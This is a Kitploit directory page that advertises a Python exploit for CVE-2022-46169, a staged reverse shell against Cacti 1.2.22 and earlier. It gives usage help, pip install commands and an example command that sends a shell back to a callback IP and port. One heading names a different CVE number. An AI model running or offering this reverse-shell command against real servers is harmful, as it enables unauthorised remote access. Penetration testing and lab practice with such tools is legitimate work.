Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-46169 — 🐍 Python Exploit for CVE-2022-46169 | Kitploit
Tools/GitHubGitHub/bkreisel/cve-2022-46169
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubbkreisel/cve-2022-46169

CVE-2022-46169

🐍 Python Exploit for CVE-2022-46169

View Repository
3 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-41343

🐍 Python Exploit for CVE-2022-46169

Staged Reverse Shell for Cacti <= 1.2.22

Example

root@kitploit:~
cve-2022-46169 10.10.14.5 44444 -u http://cacti.htb

Usage

root@kitploit:~
usage: cve-2022-46169 [-h] -u URL [-s SHELL] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Cacti Server URL
  -s SHELL, --shell SHELL
                        Remote Shell (default: /bin/bash)

PyPi Installation

root@kitploit:~
python3 -m pip install cve-2022-46169

Manual Installation

root@kitploit:~
python3 -m pip install cve-2022-46169-1.0.0-py3-none-any.whl

Download Latest Release

Demo

demo

Download Tool